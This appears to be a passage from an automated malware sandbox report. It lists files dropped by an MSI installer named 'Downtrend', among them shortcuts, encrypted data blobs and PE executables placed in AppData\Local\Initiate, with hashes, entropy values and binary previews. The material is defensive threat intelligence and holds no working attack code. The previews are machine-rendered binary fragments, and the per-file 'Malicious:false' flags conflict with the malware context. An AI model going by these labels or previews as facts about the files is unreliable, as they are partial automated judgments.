                                                                                                                                                                                            SSDEEP:48:8KdqLTKzIaAHOidAKZdA1seh/iZUkAQkqehey+2:8pLW8a39Qzy
                                                                                                                                                                                            MD5:4528AF8835F56DCDDD794F5C8B76E249
                                                                                                                                                                                            SHA1:970D1C420E079C96EFB9D885CA3AE2EADCCE1AAA
                                                                                                                                                                                            SHA-256:0AD12C99011B3795571119310B4654EFB6499E687BAE0B75A7A5E8BECC9DC146
                                                                                                                                                                                            SHA-512:6DDEE51FD3538B74B605B1FE479E49D69BAE11A2F8079AB063030F7F469EFCF5996C561D3B974C0EADE00D39578A3B5E63C2B881F9639F0C990FCCD25A6FD5B4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,......Us.9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrYu.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY}.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY}.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY}............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........+........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2689
                                                                                                                                                                                            Entropy (8bit):4.006928412647603
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:81dqLTKzIAHOidAKZdA14meh7sFiZUkmgqeh7sEy+BX:8SLW8jnay
                                                                                                                                                                                            MD5:970159E8E0BD7A270794779541F9BAEC
                                                                                                                                                                                            SHA1:698FDCF8A2DA19199FFA837C906F43287B85EB1C
                                                                                                                                                                                            SHA-256:F4CE59EF612CF125327B5BF28AB070E94DE34C5A65012C09A0B3F633E3F1C85D
                                                                                                                                                                                            SHA-512:02A26BC41DB96BD19C9CBC2ECB8D6CDCA46AAC9658C61F35C7C6E853E837FEFB87E486A524B125ECEE27497B9B4B906B2495BAFE103CB46072AEA433D7E11EC2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrYu.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY}.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY}.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY}............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........+........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 19:00:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2677
                                                                                                                                                                                            Entropy (8bit):3.991856030312617
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:89dqLTKzIaAHOidAKZdA1TehDiZUkwqehyy+R:8aLW8aEcy
                                                                                                                                                                                            MD5:809E6B1859B88BBF7BAD8F3457B66563
                                                                                                                                                                                            SHA1:90AC8E9B48B3C2A11E3C99C53CD3529D181DF24C
                                                                                                                                                                                            SHA-256:7E7770FD4F9F27028210011E947ED117586358772221EAF2F824F99E1F16DD25
                                                                                                                                                                                            SHA-512:71B75FC4519B4BC1742517DEA00919F6168A79AEA774882598D7069A43210126EA06B570C612BA4FF7EE64A070C1B0BC563F41F30B97B19EBF51263DE1E52086
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,....l.Ps.9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrYu.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY}.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY}.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY}............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........+........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 19:00:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2677
                                                                                                                                                                                            Entropy (8bit):3.984944706715573
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:85dqLTKzIaAHOidAKZdA1dehBiZUk1W1qehAy+C:8eLW8ak9gy
                                                                                                                                                                                            MD5:6BC83A5F956A58F67EA3C5150B2BEBA3
                                                                                                                                                                                            SHA1:B435A81119EE4C90F9FD091F2579F1596DB000C7
                                                                                                                                                                                            SHA-256:6298BD94FF019F969F8854E6D8166F565BAF71B694E4B5354074CCAE71240B8D
                                                                                                                                                                                            SHA-512:424E5800B7C487C5AA82B695C71DBB1B5CB1C856E2B9C92AE5D6D556AECC6239528555BA16A3B227F4ADB2809E02A3E17D2F212454DCD34306FE5A89EEFB3234
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,......[s.9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrYu.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY}.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY}.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY}............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........+........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 19:00:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2679
                                                                                                                                                                                            Entropy (8bit):3.9921611934579166
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:8mdqLTKzIaAHOidAKZdA1duTeehOuTbbiZUk5OjqehOuTbay+yT+:8dLW8aWTfTbxWOvTbay7T
                                                                                                                                                                                            MD5:E2483EBDF2C094B3144CEB6CB3EC2EF5
                                                                                                                                                                                            SHA1:FF9A082D1C32829FAE9327F41D489E27817C802E
                                                                                                                                                                                            SHA-256:E2CC25C4CFB74CEF2A9A42EF96BED27864762C360F966F1EA6A4238493CD02CE
                                                                                                                                                                                            SHA-512:B78AF408B9F1A857C7E45ACBBEB39A05AFB926739415370B9B0E77041429872DB151B42EF1CC005CFF43D482088B91682844C1A3C99D2AD059A87BE8D429702E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,.....Gs.9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrYu.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY}.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY}.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY}............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........+........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Initiate\pyexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):4477609
                                                                                                                                                                                            Entropy (8bit):7.956413661722573
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:qN9Xj3JnYcc1qyA4c1As8F+5wB+du0CYPIpMhlkXH4UCZxeFH:qbJnYx1qnF3gQlPNlkXpH
                                                                                                                                                                                            MD5:AD4C307776E72FA5AA6B9FA8D5DB4E3D
                                                                                                                                                                                            SHA1:CD7FB1BB46069217F41AA3F8B81EBB1A7D056BF4
                                                                                                                                                                                            SHA-256:C1DC82830A8892984E84EF135FB12332DE709BF6DDD2D712889CE00A5409BF30
                                                                                                                                                                                            SHA-512:7F20CC88FCC114A8640BBF106F8209AC4562A0EA275FAE6EA09CC7C88E7CF8244D21A6087C56CB0F86A1EDBB374E357B790A9E409522CBB38B83BDAD0BB65265
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:..bbl.s...C.OQ.Ru..V.OL...n.xYF..k.na..U...\..Y...t..S_...My...To..NA.J...]I..u^.]Ysc.BPr...H`....r.wL.Sy...uYAs.IGMfW...s..N..yy.L...B.UoR.....K.n..sA.ET...oppbFP.Ph....B..mrI..R..d..p.vdy.t.xl..].h...Y.f.^ed..o......bK..Tqw.rF.a.numP.P.d..[.U..q.`RsTj.....j.R...U.qf`._.PnO.g..k[......`...Qj.SP..nQ...b[CPLc...PE..G.I..\.S...QXG.J.oHUp.Zj.DL.O.como..oIuv...n..m...Bd..Xcb...y.N\w_.g..s..bK..^.T..k...t...T.[n.e..FpD.X.b....XD.m.xYD..E...WC..En^.ln..pd.RCi\ndMP.J..H..k.SSft.nr...dRjvT..vH.vy.snj.T.OSpH.Mn.`..U.[q.\j.a...G.J._..V....N]U.kWsJ..dB..^....ZLtAC.V..qYZD..WjaXhCV.EjY...li..d]s..I.Ds..IyUrcJ..XMi..H_...p.f.xN..AZ.EYed]AWgfC.a...WYh..t...aD.tT.VOWkHch.fn..TEM..N..YMA...ME....ISJR^j..C`y..Iua..j.sY.r....L.rj..T.dyFa.hCD...h.f..c.C.C....qMp...t[.q..g..Oam..K..].JW..r\S..V`_.b.]Po...`.EN.O.d...\.A.[.rMa.W.b.mGD..GDcb........MED^..S..Ey.FcQe.O..mI...\...yx..v...Qhr..Z.Lk.gn.S._e\VN...gA.J\P...l..Y.Dj....m..A_..MXl.H.F.......bW..I.c.ASNR.Q..^v.O.hH....Wbc....aU..n..q.A...`.n[X...p..P..
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Initiate\pyexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):22570
                                                                                                                                                                                            Entropy (8bit):5.339220305698995
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:5Y2p26eG9CtHs5NU8+uw724entQq+J/779pI0cdZWT4He9KKO9VGi5E:5Y2A6eqsHs5NU8z4enp+JT7Hl8bGuE
                                                                                                                                                                                            MD5:9078F84220E8B7379BFA2F4333995BC1
                                                                                                                                                                                            SHA1:21F0CBEFFDCD99BCE6521AADEAD7AA6F68EDD666
                                                                                                                                                                                            SHA-256:B7C4FEC4464E43A5736BF764F137F9AEE03C7E0D67755D964AB74854BC725F8F
                                                                                                                                                                                            SHA-512:45DD6188E3085D34E632091068F9D7C31D22E2643A20FB1A01C1C255F593E71FA2AEB34FD85D22DFACFBBDF7A1D69750206745215EE77D01A759ADA9849BE090
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:[.R..jx.GRhK.`.HgI.g.....Z...m...D......A.........mI..O.Rg..\s.....oNc.C..gr^vn.iVIy.B....TZ..g.WATY.F....v...H.....`....p..fP..OM.R..v.HDqs.....V..C...c..R.oE..xS\....`v..Ou.LkS..H.RL.UqNP.._d...f.gI]Qr....E..s..VA..A...w.UJ.\.IC.G..a.^.fPK....hbNaq.cq..[gP.QR..Vj.dSr....iX.x.aN.xk.m.V.O..`a.OEH\.Xy..oA.b.G..l..]Dh^o..i..l.RLRP.jaIpi..Q..Xv.I..GYpd.fd.....t.T..Y.n.H..v..X^.....d.d.nPy..Yk..ee.KKjS`J.m^.A...e.X...irv...J`..jyMLTn.H]Jn...FnxMp.Gg[.C.Y......KYU.XO.......TR^l\e....vvE..a.AGbJo..J.IJZGari...[R..ORhPP....LnM.Xd.n.Eo....qMgWOg..eL...U..SI.ff.hiZ.....pAUfw..IU.P...J..D..PD.W.lPD..Vq.\.Sm...Q.G.wdvuoNQ_.O\..d...`.....[.r.....L....AN\.l.mp.Ifoic.....[eBDmpk.P.......F.Gp...ST.....pUu.x...O..pn.J...oEqD.f.B.yItPao...CvL.hVk.`....X.gR.I.rb..k.hGpxI...daQyL.o.k..xO.SL.hc.a.G_wbV....bk....EV`.sOmMN...K..CqglZ...YPigWRO.q..L.NUw...q[...pVF..l.[j.Pm...j\..w._NAk.O..ec[`q.jI.X.wu.u...Z...k.g`.N.ZoC.t.M.a.w..k...g.su.WiT.c.m...o..MHr...k.LDE`..BxQ..WgY.p...........hJ.s^.tmFPYU..y.[.B.io
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Initiate\pyexec.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):653952
                                                                                                                                                                                            Entropy (8bit):6.885961951552677
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
                                                                                                                                                                                            MD5:11D49148A302DE4104DED6A92B78B0ED
                                                                                                                                                                                            SHA1:FD58A091B39ED52611ADE20A782EF58AC33012AF
                                                                                                                                                                                            SHA-256:CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
                                                                                                                                                                                            SHA-512:FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....i[...........!.....\..........@-.......p....Rx.........................0......?T....@..............................|..P...(................................3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Initiate\pyexec.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):29152
                                                                                                                                                                                            Entropy (8bit):6.656857622778623
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:+yq82Ud7/zfkn8I+ilpd4TILqIgXYoBCH/3hprl:Zq824LfMV4TqqIgXYoBCH/3hpB
                                                                                                                                                                                            MD5:B6F6C3C38568EE26F1AC70411A822405
                                                                                                                                                                                            SHA1:5B94D0ADAC4DF2D7179C378750C4E3417231125F
                                                                                                                                                                                            SHA-256:A73454C7FAD23A80A3F6540AFDB64FC334980A11402569F1986AA39995AE496D
                                                                                                                                                                                            SHA-512:5C0A5E9A623A942AFF9D58D6E7A23B7D2BBA6A4155824AA8BB94DBD069A8C15C00DF48F12224622EFCD5042B6847C8FB476C43390E9E576C42EFC22E3C02A122
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=...=...=....`.?...#.e.?...#.c.<...#.r.?.......8...=...f...#.u.$...#.b.<...#.g.<...Rich=...................PE..L......I................."...(......a,.......@....@..................................u......................................lB..P....p..@............N...#...........................................A..@............@..x............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......0..............@....rsrc...@....p.......<..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Initiate\pyexec.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2649600
                                                                                                                                                                                            Entropy (8bit):6.721887906506716
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:od0krhjbVYU9U/ElyrLKlvGBO58GBjy9nYM6JBe4PjnhMsQHNClhIdYTf2O+yX3g:xkrRyylvGB65cNCMghMtHIledkp7j
                                                                                                                                                                                            MD5:22AC09892F3706C6660D1FFE3387C07A
                                                                                                                                                                                            SHA1:06E0F1EA9958B338598D0B1378918E4EFCA773B8
                                                                                                                                                                                            SHA-256:2E158DFBCF37E16D4B0D73D59F5D583A733A12C7CFED243A76B2DE2FC9DEFBF7
                                                                                                                                                                                            SHA-512:4E40E904E680FD861BBB782C4B790C3B290E612E8FC196AB520B1AB7DE53E696DF316D45968F744DDF218CE04CA06AE2AE1CBF8B6B8CAB9C04C980CA32BEFEB0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Bu....{...{...{..[...{..l...{..l....{..l....{..l...{...z.<.{..l..{..l...{..l...{..l...{.Rich..{.................PE..L...x..^...........!.........................................................).....\g)...@..........................g!..|...Q!.x....@(. ....................P(.2\.. ................................O!.@............................................text...z........................... ..`.rdata...D.......F..................@..@.data...pC....!..(....!.............@....rsrc... ....@(.......&.............@..@.reloc..~f...P(..h....'.............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Downtrend, Author: Bandelet Huddle, Keywords: Installer, Comments: This installer database contains the logic and data required to install Downtrend., Template: Intel;1033, Revision Number: {B840F713-1596-48FF-B592-EB5BD9C36D7F}, Create Time/Date: Sat Nov 16 14:40:28 2024, Last Saved Time/Date: Sat Nov 16 14:40:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5402624
                                                                                                                                                                                            Entropy (8bit):7.99727796639253
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:98304:DwSdWnJMm46Z1K6u2/4xcjmAMHwnERXq82isnGEhxqQYh531dVnIEep:DEJM3Y4/A86Ex+ZgQY3zVnIt
                                                                                                                                                                                            MD5:66E841A153D0E6124D6DDBC9148B85F2
                                                                                                                                                                                            SHA1:F7A18EA89EB6B71F943DDFD99CB0B67D5ACE6B77
                                                                                                                                                                                            SHA-256:163CFCB8A2C2E14CB77E0D735B87F56AE653D58AD5C69C536396F2936AFD1C72
                                                                                                                                                                                            SHA-512:FF58FACFCB8C18573683C94B3B830ACCA16E246247DE5DEAD61E66E19774D5BB8DCFE7A47BA7C65E8F20BA1306DEE42B85A5E34C462F8559B73BE88CF363F4CD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Downtrend, Author: Bandelet Huddle, Keywords: Installer, Comments: This installer database contains the logic and data required to install Downtrend., Template: Intel;1033, Revision Number: {B840F713-1596-48FF-B592-EB5BD9C36D7F}, Create Time/Date: Sat Nov 16 14:40:28 2024, Last Saved Time/Date: Sat Nov 16 14:40:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5402624
                                                                                                                                                                                            Entropy (8bit):7.99727796639253
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:98304:DwSdWnJMm46Z1K6u2/4xcjmAMHwnERXq82isnGEhxqQYh531dVnIEep:DEJM3Y4/A86Ex+ZgQY3zVnIt
                                                                                                                                                                                            MD5:66E841A153D0E6124D6DDBC9148B85F2
                                                                                                                                                                                            SHA1:F7A18EA89EB6B71F943DDFD99CB0B67D5ACE6B77
                                                                                                                                                                                            SHA-256:163CFCB8A2C2E14CB77E0D735B87F56AE653D58AD5C69C536396F2936AFD1C72
                                                                                                                                                                                            SHA-512:FF58FACFCB8C18573683C94B3B830ACCA16E246247DE5DEAD61E66E19774D5BB8DCFE7A47BA7C65E8F20BA1306DEE42B85A5E34C462F8559B73BE88CF363F4CD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2621
                                                                                                                                                                                            Entropy (8bit):5.580692530535064
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:v9HrP4JnV4cCyHnSGWZVJghP3X/c1kUgRDRD+dBOJyeU1DXnZ0N5P9IEVlt0P5aG:v5Pf9BDX2Cadd9Jye67qyEPuP1
                                                                                                                                                                                            MD5:001B17E252EC8B2D84F022847763679F
                                                                                                                                                                                            SHA1:2B691DB9ED7F8CA9154FF77A1E3FC1EC167E493B
                                                                                                                                                                                            SHA-256:46F0C8020D7E39161A5D28485E5DAD11D8E15686FB1B380B0A7F3CE779A3B99C
                                                                                                                                                                                            SHA-512:75BBFDDFD43DACD1D991583C0A900E86FF4A64B852574E6008258B79D1346A6C0759AFC9A39B85B8A2B59EA65C43449427AA60B0DE61A0615EF9F165E7D9CD08
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:...@IXOS.@.....@-xrY.@.....@.....@.....@.....@.....@......&.{B7427398-E4B0-4576-85DB-A59FEFF250F5}..Downtrend..2as.msi.@.....@.....@.....@........&.{B840F713-1596-48FF-B592-EB5BD9C36D7F}.....@.....@.....@.....@.......@.....@.....@.......@......Downtrend......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{7660FA3B-7429-51F7-9F6A-116CC6E0E62D}0.C:\Users\user\AppData\Local\Initiate\msvcr90.dll.@.......@.....@.....@......&.{CCACA375-1BE6-5B9A-9B2A-16646AB91A0E},.C:\Users\user\AppData\Local\Initiate\ikvseqx.@.......@.....@.....@......&.{DB39D6C4-3238-5718-8833-EFB6BB73BAE1}*.C:\Users\user\AppData\Local\Initiate\hvotj.@.......@.....@.....@......&.{CE19E3B5-5BFF-5FE3-ACE8-9B74335B97DE}/.C:\Users\user\AppData\Local\Initiate\pyexec.exe.@.......@.....@.....@......&.{C4F3EAF2-7D0E-56E1-92CC-92B5CF9CDC9C}1.C:\Users\user\AppData\Local\Initiate\python27.dll.@.......
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                            Entropy (8bit):1.1618526098150013
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:JSbX72FjZAGiLIlHVRpqh/7777777777777777777777777vDHFzd30pZl0i8Q:JHQI56ZTF
                                                                                                                                                                                            MD5:F8FB4E28BECC88981A345B331B3BD2AF
                                                                                                                                                                                            SHA1:2BC07DAE77F96C8BA455267BF5270A9E4CCCA313
                                                                                                                                                                                            SHA-256:A287B6BBA3FEEDA0F3ED54D7BD4D4722E91173B247B550219E996732A1292DE4
                                                                                                                                                                                            SHA-512:7B52438F86E04B67FE8FAA807549EB231E3B041CDF6B8582EE419382610CD63A534C3CEFD4AD4E3EED0E3537D0764AA18EC3A4977287038EC1D55C66DBEA0685
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
